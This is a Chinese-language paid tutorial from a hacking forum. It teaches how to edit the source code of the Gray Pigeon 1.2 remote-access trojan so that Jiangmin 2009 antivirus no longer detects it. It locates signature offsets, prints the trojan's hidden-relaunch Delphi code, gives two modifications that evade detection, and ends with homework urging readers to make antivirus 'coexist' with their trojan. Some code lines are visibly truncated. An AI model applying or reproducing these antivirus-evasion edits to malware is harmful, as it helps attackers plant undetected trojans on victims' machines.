2024年4月4日发(作者:)

甲壳虫技术论坛VIP源码免杀教程

======================================================================

甲壳虫免杀VIP教程

专业的免杀技术培训基地

我们的口号:绝对不一样的免杀教程!绝对不一样的实战体验!清晰的思路!细

致全面的讲解!让你感到免杀原来可以这么简单!

动画教程只是起到技术交流作用.请大家不要利用此方法对国内的网络做破坏.

国人应该团结起来一致对外才是我们的责任.由此动画造成的任何后果和本站无

关.

======================================================================

讲师:饮雪焚心

【教程题目】

第四讲:灰鸽子1.2源代码简单修改过江民2009杀毒软件

【教程目的】 用最简单和最快速的办法过掉杀毒软件!

【教程口号】 坚信任何杀软都有弱点,只要你有一个不断探索发现的心!

附:【教程加餐】 探索发现:一招搞定江民2009 !

【教程工具】 delphi 7.0,灰鸽子V1.2源代码

【编译环境】 windowsXP SP3

【教程计划】

============================================================

(1) 定位特征码

[特征] 000BC63A_00000002

[特征] 000BD89E_00000002

江民2009

如何找到被杀源码呢,大家注意特征码中的字符,找出源码相似的!

大家发现有NetSata,好的,利用delphi的search功能找到——请看(2)

(2) 对应源码中的修改

if StrTmpList[1]='075' then

begin {重新加载}

专业的免杀技术培训基地

1

甲壳虫技术论坛VIP源码免杀教程

try

d :=False;

nect;

Winexec(pchar(paramstr(0)+' -NetSata'),SW_Hide);

Halt(0);

except

end;

Exit;

end;

这一处如何修改呢,怎样用最简单的办法过掉江民呢?

方法(1)这处功能可以不要,删掉!

方法(2)可以将Halt(0)修改为exit 或者删掉

修改如下

if StrTmpList[1]='075' then

begin {重新加载}

try

d :=False;

nect;

Winexec(pchar(paramstr(0)+' -NetSata'),SW_Hide);

except

end;

Exit;

end;

简单吧?看看能不能过掉江民2009, OK! 过掉了。

============================================================

VIP会员们,你们掌握了么?要发散你们的思维,想想还有什么修改办法,

免杀是试出来的,也许你会发现和拥有自己的方法额!嘿嘿 思考吧!!!!!

好了,教程结束!

【课后作业】

思考加实践!让杀毒软件和你的木马和平相处吧!!!

甲壳虫免杀VIP教程

专业的免杀技术培训基地

2